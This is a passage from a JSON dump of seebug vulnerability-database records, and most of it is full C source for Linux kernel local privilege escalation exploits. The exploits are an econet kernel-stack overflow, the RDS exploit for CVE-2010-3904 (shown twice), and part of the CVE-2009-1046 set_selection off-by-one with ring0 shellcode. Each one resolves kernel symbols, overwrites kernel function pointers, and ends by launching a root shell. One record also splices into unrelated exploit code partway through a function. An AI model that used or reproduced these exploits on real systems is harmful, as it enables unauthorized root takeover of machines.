{\r\n\t\t\tregion->addrs[i] = KSTACK_DIE;\r\n\t\t}\r\n\t}\r\n\r\n\t/* signal adjacent children to continue on */\r\n\tregion->addrs[upper] = KSTACK_UPPER;\r\n\tregion->addrs[lower] = KSTACK_LOWER;\r\n\r\n\t/* parent sleeps until child has clobbered the fptr */\r\n\twhile (1) {\r\n\t\tsleep(1);\r\n\t\tif (region->parent == KSTACK_CLOBBER) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\tprintf("[+] escalating privileges...\\n");\r\n\r\n\t/* trigger our clobbered fptr */\r\n\tsyscall(__NR_restart_syscall);\r\n\r\n\t/* our privileges should be escalated now */\r\n\tif (getuid() != 0) {\r\n\t\tprintf("[-] privilege escalation failed, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] launching root shell!\\n");\r\n\r\n\texecl("/bin/sh", "/bin/sh", NULL);\r\n}\r\n\r\nvoid\r\ndo_child_upper(void)\r\n{\r\n\tint i, ret, eco_sock;\r\n\tstruct sockaddr_ec eco_addr;\r\n\tstruct msghdr eco_msg;\r\n\tstruct iovec iovs[IOVS];\r\n\tstruct ifreq ifr;\r\n\tchar *target;\r\n\r\n\t/* calculate payload target, skip prologue */\r\n\ttarget = (char *) payload_child;\r\n\ttarget += 4;\r\n\t\r\n\t/* give lower child a chance to enter its wait4 call */\r\n\tsleep(1);\r\n\r\n\t/* write some zeros */\r\n\tfor (i = 0; i < STACK_OFFSET; ++i) {\r\n\t\tiovs[i].iov_base = (void *) 0x0;\r\n\t\tiovs[i].iov_len = 0;\r\n\t}\r\n\r\n\t/* overwrite saved ia32_sysret address on stack */\r\n\tiovs[STACK_OFFSET].iov_base = (void *) target;\r\n\tiovs[STACK_OFFSET].iov_len = 0x0246;\r\n\r\n\t/* force abort via EFAULT */\r\n\tfor (i = STACK_OFFSET + 1; i < IOVS; ++i) {\r\n\t\tiovs[i].iov_base = (void *) 0xffffffff00000000;\r\n\t\tiovs[i].iov_len = 0;\r\n\t}\r\n\r\n\t/* create econet socket */\r\n\teco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);\r\n\tif (eco_sock < 0) {\r\n\t\tprintf("[-] failed creating econet socket, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemset(&ifr, 0, sizeof(ifr));\r\n\tstrcpy(ifr.ifr_name, "lo");\r\n\r\n\t/* trick econet into associated with the loopback */\r\n\tret = 
ioctl(eco_sock, SIOCSIFADDR, &ifr);\r\n\tif (ret != 0) {\r\n\t\tprintf("[-] failed setting interface address, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tmemset(&eco_addr, 0, sizeof(eco_addr));\r\n\tmemset(&eco_msg, 0, sizeof(eco_msg));\r\n\teco_msg.msg_name = &eco_addr;\r\n\teco_msg.msg_namelen = sizeof(eco_addr);\r\n\teco_msg.msg_flags = 0;\r\n\teco_msg.msg_iov = &iovs[0];\r\n\teco_msg.msg_iovlen = IOVS;\r\n\r\n\tprintf("[+] upper child triggering stack overflow...\\n");\r\n\r\n\t/* trigger the kstack overflow into lower child's kstack */\r\n\tret = sendmsg(eco_sock, &eco_msg, 0);\r\n\tif (ret != -1 || errno != EFAULT) {\r\n\t\tprintf("[-] sendmsg succeeded unexpectedly, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tclose(eco_sock);\r\n}\r\n\r\nvoid\r\ndo_child_lower(void)\r\n{\r\n\tint pid;\r\n\r\n\tprintf("[+] lower child spawning a helper...\\n");\r\n\r\n\t/* fork off a helper to wait4 on */\r\n\tpid = fork();\r\n\tif (pid == 0) {\r\n\t\tprintf("[+] helper going to sleep...\\n");\r\n\t\tsleep(5);\r\n\t\tprintf("[+] helper woke up\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] lower child calling compat_sys_wait4 on helper...\\n");\r\n\r\n\t/* syscall(NR_WAIT4, pid, 0, 0, 0) */\r\n\tasm volatile (\r\n\t\t"push %%rax\\n"\r\n\t\t"push %%rbx\\n"\r\n\t\t"push %%rcx\\n"\r\n\t\t"push %%rdx\\n"\r\n\t\t"push %%rsi\\n"\r\n\t\t"movl %0, %%eax\\n"\r\n\t\t"movl %1, %%ebx\\n"\r\n\t\t"movl %2, %%ecx\\n"\r\n\t\t"movl %3, %%edx\\n"\r\n\t\t"movl %4, %%esi\\n"\r\n\t\t"int $0x80\\n"\r\n\t\t"pop %%rsi\\n"\r\n\t\t"pop %%rdx\\n"\r\n\t\t"pop %%rcx\\n"\r\n\t\t"pop %%rbx\\n"\r\n\t\t"pop %%rax\\n"\r\n\t\t:\r\n\t\t: "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)\r\n\t\t: "memory", "rax", "rbx", "rcx", "rdx", "rsi"\r\n\t);\r\n\r\n\tprintf("[+] lower child returned from compat_sys_wait4\\n");\r\n\r\n\tprintf("[+] parent's restart_block has been clobbered\\n");\r\n\r\n\t/* signal parent that our fptr should now be clobbered */\r\n\tregion->parent = 
KSTACK_CLOBBER;\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint type;\r\n\r\n\tif (sizeof(unsigned long) != 8) {\r\n\t\tprintf("[-] x86_64 only, sorry!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] looking for symbols...\\n");\r\n \r\n\tcommit_creds = (_commit_creds) get_symbol("commit_creds");\r\n\tif (!commit_creds) {\r\n\t\tprintf("[-] symbol table not available, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n \r\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");\r\n\tif (!prepare_kernel_cred) {\r\n\t\tprintf("[-] symbol table not available, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tia32_sysret = get_symbol("ia32_sysret");\r\n\tif (!ia32_sysret) {\r\n\t\tprintf("[-] symbol table not available, aborting!\\n");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] spawning children to achieve adjacent kstacks...\\n");\r\n\r\n\ttype = get_adjacent_kstacks();\r\n\r\n\tif (type == KSTACK_PARENT) {\r\n\t\tdo_parent();\r\n\t} else if (type == KSTACK_UPPER) {\r\n\t\tdo_child_upper();\r\n\t} else if (type == KSTACK_LOWER) {\r\n\t\tdo_child_lower();\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72066", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:20", "description": "No description provided by source.", "cvss3": {}, "published": "2010-10-26T00:00:00", "type": "seebug", "title": "Linux RDS Protocol Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20191", "id": "SSV:20191", "sourceData": "\n Source: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n \r\n/*\r\n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\r\n * CVE-2010-3904\r\n * by Dan Rosenberg <drosenberg@vsecurity.com>\r\n *\r\n * Copyright 2010 Virtual Security Research, LLC\r\n *\r\n * The handling 
functions for sending and receiving RDS messages\r\n * use unchecked __copy_*_user_inatomic functions without any\r\n * access checks on user-provided pointers. As a result, by\r\n * passing a kernel address as an iovec base address in recvmsg-style\r\n * calls, a local user can overwrite arbitrary kernel memory, which\r\n * can easily be used to escalate privileges to root. Alternatively,\r\n * an arbitrary kernel read can be performed via sendmsg calls.\r\n *\r\n * This exploit is simple - it resolves a few kernel symbols,\r\n * sets the security_ops to the default structure, then overwrites\r\n * a function pointer (ptrace_traceme) in that structure to point\r\n * to the payload. After triggering the payload, the original\r\n * value is restored. Hard-coding the offset of this function\r\n * pointer is a bit inelegant, but I wanted to keep it simple and\r\n * architecture-independent (i.e. no inline assembly).\r\n *\r\n * The vulnerability is yet another example of why you shouldn't\r\n * allow loading of random packet families unless you actually\r\n * need them.\r\n *\r\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\r\n * joberheide, bla, sts, and VSR\r\n *\r\n */\r\n \r\n \r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n \r\n#define RECVPORT 5555\r\n#define SENDPORT 6666\r\n \r\nint prep_sock(int port)\r\n{\r\n \r\n int s, ret;\r\n struct sockaddr_in addr;\r\n \r\n s = socket(PF_RDS, SOCK_SEQPACKET, 0);\r\n \r\n if(s < 0) {\r\n printf("[*] Could not open socket.\\n");\r\n exit(-1);\r\n }\r\n \r\n memset(&addr, 0, sizeof(addr));\r\n \r\n addr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(port);\r\n \r\n ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\r\n \r\n 
if(ret < 0) {\r\n printf("[*] Could not bind socket.\\n");\r\n exit(-1);\r\n }\r\n \r\n return s;\r\n \r\n}\r\n \r\nvoid get_message(unsigned long address, int sock)\r\n{\r\n \r\n recvfrom(sock, (void *)address, sizeof(void *), 0,\r\n NULL, NULL);\r\n \r\n}\r\n \r\nvoid send_message(unsigned long value, int sock)\r\n{\r\n \r\n int size, ret;\r\n struct sockaddr_in recvaddr;\r\n struct msghdr msg;\r\n struct iovec iov;\r\n unsigned long buf;\r\n \r\n memset(&recvaddr, 0, sizeof(recvaddr));\r\n \r\n size = sizeof(recvaddr);\r\n \r\n recvaddr.sin_port = htons(RECVPORT);\r\n recvaddr.sin_family = AF_INET;\r\n recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n \r\n memset(&msg, 0, sizeof(msg));\r\n \r\n msg.msg_name = &recvaddr;\r\n msg.msg_namelen = sizeof(recvaddr);\r\n msg.msg_iovlen = 1;\r\n \r\n buf = value;\r\n \r\n iov.iov_len = sizeof(buf);\r\n iov.iov_base = &buf;\r\n \r\n msg.msg_iov = &iov;\r\n \r\n ret = sendmsg(sock, &msg, 0);\r\n if(ret < 0) {\r\n printf("[*] Something went wrong sending.\\n");\r\n exit(-1);\r\n }\r\n}\r\n \r\nvoid write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)\r\n{\r\n \r\n if(!fork()) {\r\n sleep(1);\r\n send_message(value, sendsock);\r\n exit(1);\r\n }\r\n else {\r\n get_message(addr, recvsock);\r\n wait(NULL);\r\n }\r\n \r\n}\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\nint __attribute__((regparm(3)))\r\ngetroot(void * file, void * vma)\r\n{\r\n \r\n commit_creds(prepare_kernel_cred(0));\r\n return -1; \r\n \r\n}\r\n \r\n/* thanks spender... 
*/\r\nunsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char sname[512];\r\n struct utsname ver;\r\n int ret;\r\n int rep = 0;\r\n int oldstyle = 0;\r\n \r\n f = fopen("/proc/kallsyms", "r");\r\n if (f == NULL) {\r\n f = fopen("/proc/ksyms", "r");\r\n if (f == NULL)\r\n goto fallback;\r\n oldstyle = 1;\r\n }\r\n \r\nrepeat:\r\n ret = 0;\r\n while(ret != EOF) {\r\n if (!oldstyle)\r\n ret = fscanf(f, "%p %c %s\\n", (void **)&addr, &dummy, sname);\r\n else {\r\n ret = fscanf(f, "%p %s\\n", (void **)&addr, sname);\r\n if (ret == 2) {\r\n char *p;\r\n if (strstr(sname, "_O/") || strstr(sname, "_S."))\r\n continue;\r\n p = strrchr(sname, '_');\r\n if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {\r\n p = p - 4;\r\n while (p > (char *)sname && *(p - 1) == '_')\r\n p--;\r\n *p = '\\0';\r\n }\r\n }\r\n }\r\n if (ret == 0) {\r\n fscanf(f, "%s\\n", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, " [+] Resolved %s to %p%s\\n", name, (void *)addr, rep ? 
" (via System.map)" : "");\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n if (rep)\r\n return 0;\r\nfallback:\r\n /* didn't find the symbol, let's retry with the System.map\r\n dedicated to the pointlessness of Russell Coker's SELinux\r\n test machine (why does he keep upgrading the kernel if\r\n "all necessary security can be provided by SE Linux"?)\r\n */\r\n uname(&ver);\r\n if (strncmp(ver.release, "2.6", 3))\r\n oldstyle = 1;\r\n sprintf(sname, "/boot/System.map-%s", ver.release);\r\n f = fopen(sname, "r");\r\n if (f == NULL)\r\n return 0;\r\n rep = 1;\r\n goto repeat;\r\n}\r\n \r\nint main(int argc, char * argv[])\r\n{\r\n unsigned long sec_ops, def_ops, cap_ptrace, target;\r\n int sendsock, recvsock;\r\n struct utsname ver;\r\n \r\n printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\\n");\r\n printf("[*] by Dan Rosenberg\\n");\r\n \r\n uname(&ver);\r\n \r\n if(strncmp(ver.release, "2.6.3", 5)) {\r\n printf("[*] Your kernel is not vulnerable.\\n");\r\n return -1;\r\n } \r\n \r\n /* Resolve addresses of relevant symbols */\r\n printf("[*] Resolving kernel addresses...\\n");\r\n sec_ops = get_kernel_sym("security_ops");\r\n def_ops = get_kernel_sym("default_security_ops");\r\n cap_ptrace = get_kernel_sym("cap_ptrace_traceme");\r\n commit_creds = (_commit_creds) get_kernel_sym("commit_creds");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");\r\n \r\n if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {\r\n printf("[*] Failed to resolve kernel symbols.\\n");\r\n return -1;\r\n }\r\n \r\n /* Calculate target */\r\n target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));\r\n \r\n sendsock = prep_sock(SENDPORT);\r\n recvsock = prep_sock(RECVPORT);\r\n \r\n /* Reset security ops */\r\n printf("[*] Overwriting security ops...\\n");\r\n write_to_mem(sec_ops, def_ops, sendsock, recvsock);\r\n \r\n /* Overwrite ptrace_traceme security op fptr */\r\n 
printf("[*] Overwriting function pointer...\\n");\r\n write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);\r\n \r\n /* Trigger the payload */\r\n printf("[*] Triggering payload...\\n");\r\n ptrace(PTRACE_TRACEME, 1, NULL, NULL);\r\n \r\n /* Restore the ptrace_traceme security op */\r\n printf("[*] Restoring function pointer...\\n");\r\n write_to_mem(target, cap_ptrace, sendsock, recvsock);\r\n \r\n if(getuid()) {\r\n printf("[*] Exploit failed to get root.\\n");\r\n return -1;\r\n }\r\n \r\n printf("[*] Got root!\\n");\r\n execl("/bin/sh", "sh", NULL);\r\n \r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20191", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:07:41", "description": "BUGTRAQ ID: 44219\r\nCVE ID: CVE-2010-3904\r\n\r\nLinux Kernel is the kernel used by the open-source operating system Linux.\r\n\r\nOn Linux, recvmsg()-style socket calls are performed with an iovec structure that lets the user specify the base address and size of the buffer used to receive socket data. Each packet family is responsible for defining the functions that copy socket data; after the kernel receives the data it is returned to user space so that the user program can process the received network data.\r\n\r\nWhen copying data to user space, the RDS protocol copies the data with the
__copy_to_user_inatomic() function without first confirming that the base address of the user-supplied iovec structure points to a valid user-space address. Therefore, by supplying a kernel address as the iovec base address and issuing a recvmsg()-style socket call, a local user can write arbitrary data into kernel memory, resulting in privilege escalation to root.\n\nLinux kernel <= 2.6.36-rc8\nVendor patch:\r\n\r\nLinux\r\n-----\r\nThe vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=799c10559d60f159ab2232203f222f18fa3c4a5f", "cvss3": {}, "published": "2010-10-26T00:00:00", "type": "seebug", "title": "Linux Kernel RDS Protocol Local Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20199", "id": "SSV:20199", "sourceData": "\n http://sebug.net/exploit/20191/\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-20199", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:46:25", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70036", "id": "SSV:70036", "sourceData": "\n //source: http://www.vsecurity.com/resources/advisory/20101019-1/\r\n\r\n/* \r\n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\r\n * CVE-2010-3904\r\n * by Dan Rosenberg
<drosenberg@vsecurity.com>\r\n *\r\n * Copyright 2010 Virtual Security Research, LLC\r\n *\r\n * The handling functions for sending and receiving RDS messages\r\n * use unchecked __copy_*_user_inatomic functions without any\r\n * access checks on user-provided pointers. As a result, by\r\n * passing a kernel address as an iovec base address in recvmsg-style\r\n * calls, a local user can overwrite arbitrary kernel memory, which\r\n * can easily be used to escalate privileges to root. Alternatively,\r\n * an arbitrary kernel read can be performed via sendmsg calls.\r\n *\r\n * This exploit is simple - it resolves a few kernel symbols,\r\n * sets the security_ops to the default structure, then overwrites\r\n * a function pointer (ptrace_traceme) in that structure to point\r\n * to the payload. After triggering the payload, the original\r\n * value is restored. Hard-coding the offset of this function\r\n * pointer is a bit inelegant, but I wanted to keep it simple and\r\n * architecture-independent (i.e. 
no inline assembly).\r\n *\r\n * The vulnerability is yet another example of why you shouldn't\r\n * allow loading of random packet families unless you actually\r\n * need them.\r\n *\r\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\r\n * joberheide, bla, sts, and VSR\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <sys/ptrace.h>\r\n#include <sys/utsname.h>\r\n\r\n#define RECVPORT 5555 \r\n#define SENDPORT 6666\r\n\r\nint prep_sock(int port)\r\n{\r\n\t\r\n\tint s, ret;\r\n\tstruct sockaddr_in addr;\r\n\r\n\ts = socket(PF_RDS, SOCK_SEQPACKET, 0);\r\n\r\n\tif(s < 0) {\r\n\t\tprintf("[*] Could not open socket.\\n");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\r\n\taddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(port);\r\n\r\n\tret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\r\n\r\n\tif(ret < 0) {\r\n\t\tprintf("[*] Could not bind socket.\\n");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\treturn s;\r\n\r\n}\r\n\r\nvoid get_message(unsigned long address, int sock)\r\n{\r\n\r\n\trecvfrom(sock, (void *)address, sizeof(void *), 0,\r\n\t\t NULL, NULL);\r\n\r\n}\r\n\r\nvoid send_message(unsigned long value, int sock)\r\n{\r\n\t\r\n\tint size, ret;\r\n\tstruct sockaddr_in recvaddr;\r\n\tstruct msghdr msg;\r\n\tstruct iovec iov;\r\n\tunsigned long buf;\r\n\t\r\n\tmemset(&recvaddr, 0, sizeof(recvaddr));\r\n\r\n\tsize = sizeof(recvaddr);\r\n\r\n\trecvaddr.sin_port = htons(RECVPORT);\r\n\trecvaddr.sin_family = AF_INET;\r\n\trecvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");\r\n\r\n\tmemset(&msg, 0, sizeof(msg));\r\n\t\r\n\tmsg.msg_name = &recvaddr;\r\n\tmsg.msg_namelen = sizeof(recvaddr);\r\n\tmsg.msg_iovlen = 1;\r\n\t\r\n\tbuf = value;\r\n\r\n\tiov.iov_len = 
-1;\r\n\tshmid_kernel.shm_file = &file;\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tsetup();\r\n\ttrigger();\r\n\treturn 0;\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-69718", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:23:48", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1046"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66685", "id": "SSV:66685", "sourceData": "\n /* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption\r\n * Linux Kernel <= 2.6.28.3 \r\n *\r\n * coded by: sgrakkyu <at> antifork.org\r\n * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html\r\n *\r\n * Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow\r\n *\r\n * NOTE-1: you need a virtual console attached to the standard output (stdout) \r\n * - physical login\r\n * - ptrace() against some process with the same uid already attached to a VC\r\n * - remote management ..\r\n *\r\n * NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts\r\n * but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)\r\n * If you use an unsupported character expect some sort of recursive fatal ooops:)\r\n *\r\n * Designed to be built as x86-64 binary only (SLUB ONLY)\r\n * SCTP stack has to be available\r\n * \r\n * Tested on target:\r\n * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)\r\n * Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)\r\n * Fedora Core 10 x86_64 (default installed kernel - without selinux)\r\n *\r\n */\r\n\r\n\r\n#define _GNU_SOURCE\r\n#include 
<stdio.h>\r\n#include <sched.h>\r\n#include <errno.h>\r\n#include <netinet/in.h>\r\n#include <netinet/sctp.h>\r\n#include <arpa/inet.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <sys/ioctl.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <linux/tiocl.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <sys/mman.h>\r\n#include <sched.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n\r\n#ifndef __x86_64__\r\n#error "Architecture Unsupported"\r\n#error "This code was written for x86-64 target and has to be built as x86-64 binary"\r\n#else\r\n\r\n#ifndef __u8\r\n#define __u8 uint8_t\r\n#endif\r\n#ifndef __u16\r\n#define __u16 uint16_t\r\n#endif\r\n#ifndef __u32\r\n#define __u32 uint32_t\r\n#endif\r\n#ifndef __u64 \r\n#define __u64 uint64_t\r\n#endif\r\n\r\n\r\n#define STREAM_ZERO 10\r\n#define STREAM_ZERO_ALT 12\r\n\r\n#define SCTP_STREAM 22\r\n#define STACK_SIZE 0x1000\r\n#define PAGE_SIZE 0x1000\r\n#define STRUCT_PAGE 0x0000000000000000\r\n#define STRUCT_PAGE_ALT 0x0000000100000000 \r\n#define CODE_PAGE 0x0000000000010000\r\n#define LOCALHOST "127.0.0.1"\r\n#define KMALLOC "kmalloc-128"\r\n#define TIMER_LIST_FOPS "timer_list_fops"\r\n\r\n#define __msg_f(format, args...) 
\\\r\n do { fprintf(stdout, format, ## args); } while(0)\r\n\r\n#define __msg(msg) \\\r\n do { fprintf(stdout, "%s", msg); } while(0)\r\n\r\n#define __fatal_errno(msg) \\\r\ndo { perror(msg); __free_stuff(); exit(1); } while(0)\r\n\r\n#define __fatal(msg) \\\r\ndo { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)\r\n\r\n\r\n\r\n#define CJUMP_OFF 13\r\nchar ring0[]=\r\n"\\x57" // push %rdi\r\n"\\x50" // push %rax\r\n"\\x65\\x48\\x8b\\x3c\\x25\\x00\\x00\\x00\\x00" // mov %gs:0x0,%rdi\r\n"\\x48\\xb8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41" // mov xxx, %rax\r\n"\\xff\\xd0" // callq *%rax\r\n"\\x58" // pop %rax\r\n"\\x5f" // pop %rdi\r\n"\\xc3"; // retq\r\n\r\n\r\n/* conn struct */\r\nstatic __u16 srvport;\r\nstruct sockaddr_in server_s;\r\nstatic struct sockaddr_in caddr;\r\n\r\n/* some fds.. */\r\nstatic int g_array[10];\r\nstatic int fd_zmap_srv=-1;\r\nstatic int kmalloc_fd=-1;\r\nstatic int unsafe_fd[4] = {-1,-1,-1,-1}; \r\n\r\n/* misc */\r\nstatic int dorec = 0, cankill=1, highpage=0;\r\nstatic char cstack[STACK_SIZE*2];\r\nstatic __u16 zstream=STREAM_ZERO;\r\nstatic __u32 uid,gid;\r\nstatic __u64 fops;\r\nstatic pid_t child=0;\r\nstatic char symbuf[20000];\r\n\r\nstatic void __free_stuff()\r\n{\r\n int i;\r\n for(i=3; i<2048; i++) \r\n {\r\n if((unsafe_fd[0] == i || unsafe_fd[1] == i || \r\n unsafe_fd[2] == i || unsafe_fd[3] == i))\r\n continue; \r\n\r\n close(i);\r\n }\r\n}\r\n\r\nstatic void bindcpu()\r\n{\r\n cpu_set_t set;\r\n CPU_ZERO(&set);\r\n CPU_SET(0, &set);\r\n \r\n if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)\r\n __fatal_errno("setaffinity");\r\n}\r\n\r\n/* parse functions are not bof-free:) */\r\nstatic __u64 get_fops_addr()\r\n{\r\n FILE* stream;\r\n char fbuf[256];\r\n char addr[32];\r\n \r\n stream = fopen("/proc/kallsyms", "r");\r\n if(stream < 0)\r\n __fatal_errno("open: kallsyms");\r\n\r\n memset(fbuf, 0x00, sizeof(fbuf));\r\n while(fgets(fbuf, 256, stream) > 0)\r\n {\r\n char *p = fbuf;\r\n char *a = addr;\r\n memset(addr, 
0x00, sizeof(addr));\r\n fbuf[strlen(fbuf)-1] = 0;\r\n while(*p != ' ')\r\n *a++ = *p++; \r\n p += 3;\r\n if(!strcmp(p, TIMER_LIST_FOPS))\r\n return strtoul(addr, NULL, 16); \r\n }\r\n\r\n return 0;\r\n}\r\n\r\nstatic int get_total_object(int fd)\r\n{\r\n char name[32];\r\n char used[32];\r\n char total[32];\r\n char *ptr[] = {name, used, total};\r\n int ret,i,toread=sizeof(symbuf)-1;\r\n char *p = symbuf;\r\n\r\n lseek(fd, 0, SEEK_SET);\r\n memset(symbuf, 0x00, sizeof(symbuf));\r\n while( (ret = read(fd, p, toread)) > 0)\r\n {\r\n p += ret; \r\n toread -= ret;\r\n }\r\n\r\n p = symbuf;\r\n do\r\n {\r\n for(i=0; i<sizeof(ptr)/sizeof(void*); i++)\r\n {\r\n char *d = ptr[i];\r\n while(*p != ' ')\r\n *d++ = *p++; \r\n *d = 0;\r\n while(*p == ' ')\r\n p++;\r\n }\r\n \r\n while(*p++ != '\\n');\r\n \r\n if(!strcmp(KMALLOC, name))\r\n return atoi(total); \r\n\r\n } while(*p != 0);\r\n return 0;\r\n}\r\n\r\n\r\nstatic void ring0c(void* t)\r\n{\r\n int i;\r\n __u32 *p = t;\r\n for(i=0; i<1100; i++,p++)\r\n {\r\n if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&\r\n p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)\r\n {\r\n p[0] = p[1] = p[2] = p[3] = 0;\r\n p[4] = p[5] = p[6] = p[7] = 0;\r\n /* dont care about caps */\r\n break;\r\n }\r\n }\r\n}\r\n\r\n\r\nstatic int get_kmalloc_fd()\r\n{\r\n int fd;\r\n fd = open("/proc/slabinfo", O_RDONLY);\r\n if(fd < 0)\r\n __fatal_errno("open: slabinfo");\r\n return fd;\r\n}\r\n\r\n\r\nstatic int write_sctp(int fd, struct sockaddr_in *s, int channel)\r\n{\r\n int ret;\r\n ret = sctp_sendmsg(fd, "a", 1,\r\n (struct sockaddr *)s, sizeof(struct sockaddr_in),\r\n 0, 0, channel, 0 ,0);\r\n return ret;\r\n}\r\n\r\n\r\nstatic void set_sctp_sock_opt(int fd, __u16 in, __u16 out)\r\n{\r\n struct sctp_initmsg msg;\r\n int val=1;\r\n socklen_t len_sctp = sizeof(struct sctp_initmsg);\r\n getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);\r\n msg.sinit_num_ostreams=out; \r\n msg.sinit_max_instreams=in;\r\n setsockopt(fd, 
